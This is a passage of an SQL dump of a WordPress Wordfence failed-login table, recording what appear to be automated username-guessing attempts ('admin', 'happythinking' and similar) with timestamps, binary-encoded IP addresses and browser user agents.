(10421, 51208, 1712319646.223407, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz±l¾', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10420, 51207, 1712319640.881939, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿp†£W', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10419, 51206, 1712319621.090632, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuËÚ#', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10418, 51205, 1712319620.120164, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±~Ä', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10417, 51204, 1712319612.346353, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz±mj', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10416, 51203, 1712319608.834806, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ3eú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10415, 51203, 1712319608.824278, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ3eú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10414, 51202, 1712319593.679169, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%q9', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10413, 51201, 1712319591.941741, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|Ù{™', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10412, 51200, 1712319590.327984, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿBBÈ	', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko');
INSERT INTO `wpou_wflogins` VALUES
(10411, 51199, 1712319590.154262, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-äÂk', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10410, 51197, 1712319580.721552, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯ej‚', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10409, 51195, 1712319579.624471, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÞ¾¢', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10408, 51194, 1712319579.023820, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÎ>2', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10407, 51193, 1712319578.728930, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿZqà\\', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10406, 51192, 1712319565.989510, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;Zœ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10405, 51191, 1712319555.713914, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxn', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10404, 51190, 1712319552.820429, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿvÍ`', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10403, 51189, 1712319551.325620, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÒ Í', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10402, 51187, 1712319543.111500, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ xÔ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10401, 51186, 1712319542.541234, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³<¬7', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10400, 51185, 1712319540.489784, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+øâ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10399, 51184, 1712319533.669468, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ¤¶2', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10398, 51183, 1712319530.151547, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;[ƒW', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10397, 51182, 1712319529.532716, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿfÞt', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10396, 51181, 1712319524.390263, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ8º#', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10395, 51180, 1712319509.121542, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»,ö', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10394, 51179, 1712319496.191747, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)q½A', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10393, 51178, 1712319490.321080, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿUaÔU', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10392, 51176, 1712319484.320931, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgû3Å', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10391, 51175, 1712319480.949105, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÌ1þ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10390, 51174, 1712319474.470590, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg»Dê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10389, 51172, 1712319456.830083, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³?M', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10388, 51171, 1712319452.563363, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%qI', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10387, 51169, 1712319450.306165, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«<ê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10386, 51168, 1712319449.234116, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxŠlG', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10385, 51166, 1712319434.299992, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž\Z,', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10384, 51165, 1712319430.700239, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¢út', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10383, 51164, 1712319424.181729, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿVaUe', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10382, 51163, 1712319419.903137, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßë…b', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10381, 51161, 1712319403.651562, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs`|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10380, 51159, 1712319399.721999, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuØxÖ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10379, 51158, 1712319392.512633, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$Ô	', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10378, 51157, 1712319391.378766, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÐ:cM', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10377, 51156, 1712319386.937161, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ¿ªÉ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10376, 51154, 1712319369.651365, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWtµö', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10375, 51153, 1712319367.018316, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1‘É|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10374, 51152, 1712319365.834382, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg6³Z', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10373, 51151, 1712319355.642027, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿTl„2', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10372, 51150, 1712319355.431628, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿzªï', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10371, 51149, 1712319354.522338, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¸H', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10370, 51147, 1712319351.222516, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgèe¶', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10369, 51146, 1712319329.784173, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnëÙ€', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10368, 51145, 1712319323.517600, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ48', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10367, 51144, 1712319300.121601, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºû®ï', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10366, 51143, 1712319293.491430, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz«', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10365, 51140, 1712319273.626071, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgU›', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10364, 51139, 1712319271.491781, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«LV', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10363, 51138, 1712319271.270727, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$¼…', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10362, 51137, 1712319271.243347, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅýFJ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10361, 51136, 1712319264.104536, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÇÈ­', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10360, 51134, 1712319255.048630, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO§6Ú', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10359, 51133, 1712319254.638735, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuþ#ª', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10358, 51132, 1712319253.520637, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/ðè', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10110, 48637, 1709606006.048207, 1, 'loginFailInvalidUsername', 'adminsuper', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGìX', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10109, 48636, 1709605964.281094, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËš[\r', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10108, 48635, 1709605963.568288, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËš[\r', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10107, 48634, 1709605932.805557, 1, 'loginFailInvalidUsername', 'redaksi', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±ð', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10106, 48633, 1709605932.804514, 1, 'loginFailInvalidUsername', 'adminwp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±ð', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10105, 48632, 1709605932.624919, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇnS', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10104, 48631, 1709605931.960703, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇnS', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10103, 48630, 1709605896.467188, 1, 'loginFailInvalidUsername', 'matakucing3', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓõs', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10084, 47263, 1707694611.179671, 1, 'loginFailInvalidUsername', 'WPADMIN', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^	', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10083, 47262, 1707694553.495779, 1, 'loginFailInvalidUsername', 'itsme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgqþ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10082, 47261, 1707694552.908037, 1, 'loginFailInvalidUsername', '1001010', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgqþ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10081, 47260, 1707694516.990294, 1, 'loginFailInvalidUsername', 'wordcamp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_oø', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10080, 47259, 1707694516.361731, 1, 'loginFailInvalidUsername', 'hostingadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_oø', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10079, 47258, 1707694441.795546, 1, 'loginFailInvalidUsername', 'wpenginesupport', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ+þ\n', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10078, 47257, 1707694441.090552, 1, 'loginFailInvalidUsername', 'adminlin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ+þ\n', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10077, 47256, 1707694398.310914, 1, 'loginFailInvalidUsername', 'wadminw', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"{z', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10075, 47143, 1707122375.087367, 1, 'loginFailInvalidUsername', 'itsme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ\\(Ò', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10076, 47255, 1707694398.179173, 1, 'loginFailInvalidUsername', 'wpmanager', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"{z', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10090, 47292, 1707864654.580423, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs¥¦¢', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10089, 47291, 1707864652.549002, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs¥¦¢', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10088, 47290, 1707864650.524497, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs¥¦¢', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10087, 47289, 1707864648.466743, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs¥¦¢', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10086, 47288, 1707864646.432457, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs¥¦¢', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10085, 47287, 1707864644.473049, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs¥¦¢', 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10098, 48436, 1709306676.990006, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿæ)L', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10093, 48029, 1708772897.442611, 1, 'loginFailInvalidUsername', 'wpcore', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿw.°Þ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10092, 48027, 1708772777.612713, 1, 'loginFailInvalidUsername', 'seomaster009', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10091, 48026, 1708772777.407360, 1, 'loginFailInvalidUsername', 'administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸË¥', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10095, 48241, 1708967362.788387, 1, 'loginFailInvalidUsername', 'wordpress_administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿB!ÍV', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10094, 48240, 1708967362.136012, 1, 'loginFailInvalidUsername', 'bapaksaya', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿB!ÍV', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10097, 48435, 1709306674.727928, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿæ)L', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10096, 48434, 1709306672.791906, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿæ)L', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10102, 48629, 1709605895.902298, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÓõs', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10101, 48628, 1709605852.432315, 1, 'loginFailInvalidUsername', 'wpadminee', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGàT', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10099, 48606, 1709563330.865660, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß»ix', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10100, 48627, 1709605852.291116, 1, 'loginFailInvalidUsername', 'crander', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGàT', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10128, 48830, 1709840757.282556, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),
(10127, 48810, 1709815550.684565, 1, 'loginFailInvalidUsername', 'pbouchard', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÖ²J', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),
(10126, 48805, 1709815531.195545, 1, 'loginFailInvalidUsername', 'catmeow', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),
(10125, 48804, 1709815512.811380, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ4¬––', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(10124, 48797, 1709793044.266849, 1, 'loginFailInvalidUsername', 'teamupload', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[k–\\', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(10119, 48715, 1709736647.958294, 1, 'loginFailInvalidUsername', 'wordcamp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO`AQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1'),
(10118, 48714, 1709736642.109089, 1, 'loginFailInvalidUsername', 'AdMiN', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\rC\Z', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),
(10117, 48685, 1709712180.172927, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿKw–*', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),
(10116, 48678, 1709712151.556863, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Á:', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),
(10115, 48677, 1709712151.184252, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²€¸â', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'),
(10123, 48788, 1709792995.274058, 1, 'loginFailInvalidUsername', 'cr4p5', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.·Ø…', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'),
(10122, 48774, 1709782671.610379, 1, 'loginFailInvalidUsername', 'master562', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),
(10121, 48768, 1709782644.644203, 1, 'loginFailInvalidUsername', 'hwz', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk®BÌ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'),
